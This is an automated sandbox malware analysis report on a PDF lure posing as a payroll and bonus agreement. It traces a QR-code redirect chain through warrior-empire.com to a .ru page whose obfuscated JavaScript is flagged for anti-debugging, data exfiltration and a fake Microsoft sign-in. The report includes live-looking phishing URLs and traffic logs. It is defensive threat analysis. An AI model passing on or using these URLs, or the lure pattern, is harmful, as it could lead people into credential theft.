Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Selvi Payroll Benefits & Bonus Agreementfdp.pdf

Overview

General Information

Sample name:Selvi Payroll Benefits & Bonus Agreementfdp.pdf
Analysis ID:1585938
MD5:5e9e3752816b94449f2c5aef35798dc7
SHA1:08ae2a548e3060f8ec1fac3155c3d0e92e719209
SHA256:871d4874d0092b22ff1e21aff42ba88000ed51d1070a57e7ea5999627045bcfe
Infos:

Detection

Score:48
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected landing page (webpage, office document or email)
AI detected suspicious Javascript
HTML body contains low number of good links
HTML page contains hidden javascript code
HTML title does not match URL
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Stores files to the Windows start menu directory
Uses insecure TLS / SSL version for HTTPS connection

Classification

  • System is w10x64
  • Acrobat.exe (PID: 4416 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\Selvi Payroll Benefits & Bonus Agreementfdp.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
    • AcroCEF.exe (PID: 6508 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
      • AcroCEF.exe (PID: 7232 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2096 --field-trial-handle=1520,i,5443044251436294696,11172737723768738417,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
  • chrome.exe (PID: 7712 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://warrior-empire.com/res444.php?4-68747470733a2f2f5050782e6d757369637374726576626e672e72752f417834454d2f2346-##victimemail## MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 8072 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2436 --field-trial-handle=2184,i,72692833657749042,4424346579211033775,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

Phishing

barindex
Source: PDF documentJoe Sandbox AI: PDF document contains QR code
Source: 0.3.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://ppx.musicstrevbng.ru/Ax4EM/#F#G##victimema... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to suspicious domains. The script collects user data and sends it to an unknown domain, and it also redirects the user to a Microsoft login page, which is likely a phishing attempt. Overall, this script demonstrates highly suspicious and malicious behavior, posing a significant security risk.
Source: 0.1.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://ppx.musicstrevbng.ru/Ax4EM/#F#G##victimema... The provided JavaScript snippet exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code/URLs. While some of the behaviors may be related to legitimate functionality, the overall risk level is high due to the presence of multiple malicious indicators.
Source: 0.2.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://ppx.musicstrevbng.ru/Ax4EM/#F#G##victimema... This script exhibits several high-risk behaviors, including detecting the presence of web automation tools, disabling common browser debugging and developer tools, and redirecting the user to a suspicious domain. The script also includes an obfuscated interval function that appears to be designed to detect and respond to debugging attempts. Overall, this script demonstrates a clear intent to prevent analysis and potentially engage in malicious activities, warranting a high-risk score.
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638719410425060947.NDFhMWVmMzItY2ZlMS00ODhmLWE1ZGUtYzI3OGE5ZDQ1ZmE0YzRkZWQ1ZGQtNzY1MS00MGRlLWEwMzEtZGFkOTYyNWQ2NDhh&ui_locales=en-US&mkt=en-US&client-request-id=e1a1eeff-d7ab-4fe2-a22c-e0c6c767a1d6&state=b-VdhWSWw4tsGh-S7wmqhfbPFGYjkz20qNsukDhCDTL3SU53vsJ8g9qc-GKCYzAJ7DMmSdKZ3eljPX7ZQQ6j8oYvT01IUkLoNtOlhG1P5OfRfLYpZFdYm_kPfoJNBC46rJz3NK-mqRGGDullAgSFQsR-vsEwgrMwWOYE52zkZtqoM-hTvE6O7HPvlIcjOP8spprlL_FEQrtkXgScFk1AZUxJY4EkME53AweNGX5xXZROPUwd_CqnWhDTZhDrGvR39is2uBBuXKSH515RU4VV0w&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: Number of links: 0
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638719410425060947.NDFhMWVmMzItY2ZlMS00ODhmLWE1ZGUtYzI3OGE5ZDQ1ZmE0YzRkZWQ1ZGQtNzY1MS00MGRlLWEwMzEtZGFkOTYyNWQ2NDhh&ui_locales=en-US&mkt=en-US&client-request-id=e1a1eeff-d7ab-4fe2-a22c-e0c6c767a1d6&state=b-VdhWSWw4tsGh-S7wmqhfbPFGYjkz20qNsukDhCDTL3SU53vsJ8g9qc-GKCYzAJ7DMmSdKZ3eljPX7ZQQ6j8oYvT01IUkLoNtOlhG1P5OfRfLYpZFdYm_kPfoJNBC46rJz3NK-mqRGGDullAgSFQsR-vsEwgrMwWOYE52zkZtqoM-hTvE6O7HPvlIcjOP8spprlL_FEQrtkXgScFk1AZUxJY4EkME53AweNGX5xXZROPUwd_CqnWhDTZhDrGvR39is2uBBuXKSH515RU4VV0w&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: Number of links: 0
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638719410425060947.NDFhMWVmMzItY2ZlMS00ODhmLWE1ZGUtYzI3OGE5ZDQ1ZmE0YzRkZWQ1ZGQtNzY1MS00MGRlLWEwMzEtZGFkOTYyNWQ2NDhh&ui_locales=en-US&mkt=en-US&client-request-id=e1a1eeff-d7ab-4fe2-a22c-e0c6c767a1d6&state=b-VdhWSWw4tsGh-S7wmqhfbPFGYjkz20qNsukDhCDTL3SU53vsJ8g9qc-GKCYzAJ7DMmSdKZ3eljPX7ZQQ6j8oYvT01IUkLoNtOlhG1P5OfRfLYpZFdYm_kPfoJNBC46rJz3NK-mqRGGDullAgSFQsR-vsEwgrMwWOYE52zkZtqoM-hTvE6O7HPvlIcjOP8spprlL_FEQrtkXgScFk1AZUxJY4EkME53AweNGX5xXZROPUwd_CqnWhDTZhDrGvR39is2uBBuXKSH515RU4VV0w&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: Base64 decoded: 41a1ef32-cfe1-488f-a5de-c278a9d45fa4c4ded5dd-7651-40de-a031-dad9625d648a
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638719410425060947.NDFhMWVmMzItY2ZlMS00ODhmLWE1ZGUtYzI3OGE5ZDQ1ZmE0YzRkZWQ1ZGQtNzY1MS00MGRlLWEwMzEtZGFkOTYyNWQ2NDhh&ui_locales=en-US&mkt=en-US&client-request-id=e1a1eeff-d7ab-4fe2-a22c-e0c6c767a1d6&state=b-VdhWSWw4tsGh-S7wmqhfbPFGYjkz20qNsukDhCDTL3SU53vsJ8g9qc-GKCYzAJ7DMmSdKZ3eljPX7ZQQ6j8oYvT01IUkLoNtOlhG1P5OfRfLYpZFdYm_kPfoJNBC46rJz3NK-mqRGGDullAgSFQsR-vsEwgrMwWOYE52zkZtqoM-hTvE6O7HPvlIcjOP8spprlL_FEQrtkXgScFk1AZUxJY4EkME53AweNGX5xXZROPUwd_CqnWhDTZhDrGvR39is2uBBuXKSH515RU4VV0w&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: Title: Redirecting does not match URL
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638719410425060947.NDFhMWVmMzItY2ZlMS00ODhmLWE1ZGUtYzI3OGE5ZDQ1ZmE0YzRkZWQ1ZGQtNzY1MS00MGRlLWEwMzEtZGFkOTYyNWQ2NDhh&ui_locales=en-US&mkt=en-US&client-request-id=e1a1eeff-d7ab-4fe2-a22c-e0c6c767a1d6&state=b-VdhWSWw4tsGh-S7wmqhfbPFGYjkz20qNsukDhCDTL3SU53vsJ8g9qc-GKCYzAJ7DMmSdKZ3eljPX7ZQQ6j8oYvT01IUkLoNtOlhG1P5OfRfLYpZFdYm_kPfoJNBC46rJz3NK-mqRGGDullAgSFQsR-vsEwgrMwWOYE52zkZtqoM-hTvE6O7HPvlIcjOP8spprlL_FEQrtkXgScFk1AZUxJY4EkME53AweNGX5xXZROPUwd_CqnWhDTZhDrGvR39is2uBBuXKSH515RU4VV0w&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: Title: Sign in to your account does not match URL
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638719410425060947.NDFhMWVmMzItY2ZlMS00ODhmLWE1ZGUtYzI3OGE5ZDQ1ZmE0YzRkZWQ1ZGQtNzY1MS00MGRlLWEwMzEtZGFkOTYyNWQ2NDhh&ui_locales=en-US&mkt=en-US&client-request-id=e1a1eeff-d7ab-4fe2-a22c-e0c6c767a1d6&state=b-VdhWSWw4tsGh-S7wmqhfbPFGYjkz20qNsukDhCDTL3SU53vsJ8g9qc-GKCYzAJ7DMmSdKZ3eljPX7ZQQ6j8oYvT01IUkLoNtOlhG1P5OfRfLYpZFdYm_kPfoJNBC46rJz3NK-mqRGGDullAgSFQsR-vsEwgrMwWOYE52zkZtqoM-hTvE6O7HPvlIcjOP8spprlL_FEQrtkXgScFk1AZUxJY4EkME53AweNGX5xXZROPUwd_CqnWhDTZhDrGvR39is2uBBuXKSH515RU4VV0w&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: <input type="password" .../> found
Source: https://ppx.musicstrevbng.ru/Ax4EM/#F#G##victimemail##HTTP Parser: No favicon
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638719410425060947.NDFhMWVmMzItY2ZlMS00ODhmLWE1ZGUtYzI3OGE5ZDQ1ZmE0YzRkZWQ1ZGQtNzY1MS00MGRlLWEwMzEtZGFkOTYyNWQ2NDhh&ui_locales=en-US&mkt=en-US&client-request-id=e1a1eeff-d7ab-4fe2-a22c-e0c6c767a1d6&state=b-VdhWSWw4tsGh-S7wmqhfbPFGYjkz20qNsukDhCDTL3SU53vsJ8g9qc-GKCYzAJ7DMmSdKZ3eljPX7ZQQ6j8oYvT01IUkLoNtOlhG1P5OfRfLYpZFdYm_kPfoJNBC46rJz3NK-mqRGGDullAgSFQsR-vsEwgrMwWOYE52zkZtqoM-hTvE6O7HPvlIcjOP8spprlL_FEQrtkXgScFk1AZUxJY4EkME53AweNGX5xXZROPUwd_CqnWhDTZhDrGvR39is2uBBuXKSH515RU4VV0w&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: No favicon
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638719410425060947.NDFhMWVmMzItY2ZlMS00ODhmLWE1ZGUtYzI3OGE5ZDQ1ZmE0YzRkZWQ1ZGQtNzY1MS00MGRlLWEwMzEtZGFkOTYyNWQ2NDhh&ui_locales=en-US&mkt=en-US&client-request-id=e1a1eeff-d7ab-4fe2-a22c-e0c6c767a1d6&state=b-VdhWSWw4tsGh-S7wmqhfbPFGYjkz20qNsukDhCDTL3SU53vsJ8g9qc-GKCYzAJ7DMmSdKZ3eljPX7ZQQ6j8oYvT01IUkLoNtOlhG1P5OfRfLYpZFdYm_kPfoJNBC46rJz3NK-mqRGGDullAgSFQsR-vsEwgrMwWOYE52zkZtqoM-hTvE6O7HPvlIcjOP8spprlL_FEQrtkXgScFk1AZUxJY4EkME53AweNGX5xXZROPUwd_CqnWhDTZhDrGvR39is2uBBuXKSH515RU4VV0w&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: No <meta name="author".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638719410425060947.NDFhMWVmMzItY2ZlMS00ODhmLWE1ZGUtYzI3OGE5ZDQ1ZmE0YzRkZWQ1ZGQtNzY1MS00MGRlLWEwMzEtZGFkOTYyNWQ2NDhh&ui_locales=en-US&mkt=en-US&client-request-id=e1a1eeff-d7ab-4fe2-a22c-e0c6c767a1d6&state=b-VdhWSWw4tsGh-S7wmqhfbPFGYjkz20qNsukDhCDTL3SU53vsJ8g9qc-GKCYzAJ7DMmSdKZ3eljPX7ZQQ6j8oYvT01IUkLoNtOlhG1P5OfRfLYpZFdYm_kPfoJNBC46rJz3NK-mqRGGDullAgSFQsR-vsEwgrMwWOYE52zkZtqoM-hTvE6O7HPvlIcjOP8spprlL_FEQrtkXgScFk1AZUxJY4EkME53AweNGX5xXZROPUwd_CqnWhDTZhDrGvR39is2uBBuXKSH515RU4VV0w&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="author".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638719410425060947.NDFhMWVmMzItY2ZlMS00ODhmLWE1ZGUtYzI3OGE5ZDQ1ZmE0YzRkZWQ1ZGQtNzY1MS00MGRlLWEwMzEtZGFkOTYyNWQ2NDhh&ui_locales=en-US&mkt=en-US&client-request-id=e1a1eeff-d7ab-4fe2-a22c-e0c6c767a1d6&state=b-VdhWSWw4tsGh-S7wmqhfbPFGYjkz20qNsukDhCDTL3SU53vsJ8g9qc-GKCYzAJ7DMmSdKZ3eljPX7ZQQ6j8oYvT01IUkLoNtOlhG1P5OfRfLYpZFdYm_kPfoJNBC46rJz3NK-mqRGGDullAgSFQsR-vsEwgrMwWOYE52zkZtqoM-hTvE6O7HPvlIcjOP8spprlL_FEQrtkXgScFk1AZUxJY4EkME53AweNGX5xXZROPUwd_CqnWhDTZhDrGvR39is2uBBuXKSH515RU4VV0w&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="author".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638719410425060947.NDFhMWVmMzItY2ZlMS00ODhmLWE1ZGUtYzI3OGE5ZDQ1ZmE0YzRkZWQ1ZGQtNzY1MS00MGRlLWEwMzEtZGFkOTYyNWQ2NDhh&ui_locales=en-US&mkt=en-US&client-request-id=e1a1eeff-d7ab-4fe2-a22c-e0c6c767a1d6&state=b-VdhWSWw4tsGh-S7wmqhfbPFGYjkz20qNsukDhCDTL3SU53vsJ8g9qc-GKCYzAJ7DMmSdKZ3eljPX7ZQQ6j8oYvT01IUkLoNtOlhG1P5OfRfLYpZFdYm_kPfoJNBC46rJz3NK-mqRGGDullAgSFQsR-vsEwgrMwWOYE52zkZtqoM-hTvE6O7HPvlIcjOP8spprlL_FEQrtkXgScFk1AZUxJY4EkME53AweNGX5xXZROPUwd_CqnWhDTZhDrGvR39is2uBBuXKSH515RU4VV0w&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: No <meta name="copyright".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638719410425060947.NDFhMWVmMzItY2ZlMS00ODhmLWE1ZGUtYzI3OGE5ZDQ1ZmE0YzRkZWQ1ZGQtNzY1MS00MGRlLWEwMzEtZGFkOTYyNWQ2NDhh&ui_locales=en-US&mkt=en-US&client-request-id=e1a1eeff-d7ab-4fe2-a22c-e0c6c767a1d6&state=b-VdhWSWw4tsGh-S7wmqhfbPFGYjkz20qNsukDhCDTL3SU53vsJ8g9qc-GKCYzAJ7DMmSdKZ3eljPX7ZQQ6j8oYvT01IUkLoNtOlhG1P5OfRfLYpZFdYm_kPfoJNBC46rJz3NK-mqRGGDullAgSFQsR-vsEwgrMwWOYE52zkZtqoM-hTvE6O7HPvlIcjOP8spprlL_FEQrtkXgScFk1AZUxJY4EkME53AweNGX5xXZROPUwd_CqnWhDTZhDrGvR39is2uBBuXKSH515RU4VV0w&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="copyright".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638719410425060947.NDFhMWVmMzItY2ZlMS00ODhmLWE1ZGUtYzI3OGE5ZDQ1ZmE0YzRkZWQ1ZGQtNzY1MS00MGRlLWEwMzEtZGFkOTYyNWQ2NDhh&ui_locales=en-US&mkt=en-US&client-request-id=e1a1eeff-d7ab-4fe2-a22c-e0c6c767a1d6&state=b-VdhWSWw4tsGh-S7wmqhfbPFGYjkz20qNsukDhCDTL3SU53vsJ8g9qc-GKCYzAJ7DMmSdKZ3eljPX7ZQQ6j8oYvT01IUkLoNtOlhG1P5OfRfLYpZFdYm_kPfoJNBC46rJz3NK-mqRGGDullAgSFQsR-vsEwgrMwWOYE52zkZtqoM-hTvE6O7HPvlIcjOP8spprlL_FEQrtkXgScFk1AZUxJY4EkME53AweNGX5xXZROPUwd_CqnWhDTZhDrGvR39is2uBBuXKSH515RU4VV0w&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="copyright".. found
Source: unknownHTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49757 version: TLS 1.0
Source: Joe Sandbox ViewIP Address: 104.18.94.41 104.18.94.41
Source: Joe Sandbox ViewIP Address: 151.101.130.137 151.101.130.137
Source: Joe Sandbox ViewIP Address: 151.101.130.137 151.101.130.137
Source: Joe Sandbox ViewIP Address: 151.101.66.137 151.101.66.137
Source: Joe Sandbox ViewIP Address: 151.101.66.137 151.101.66.137
Source: Joe Sandbox ViewJA3 fingerprint: 1138de370e523e824bbca92d049a3777
Source: unknownHTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49757 version: TLS 1.0
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /res444.php?4-68747470733a2f2f5050782e6d757369637374726576626e672e72752f417834454d2f2346- HTTP/1.1Host: warrior-empire.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /Ax4EM/ HTTP/1.1Host: ppx.musicstrevbng.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://warrior-empire.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/api.js?render=explicit HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://ppx.musicstrevbng.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://ppx.musicstrevbng.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://ppx.musicstrevbng.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/g/849bfe45bf45/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://ppx.musicstrevbng.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
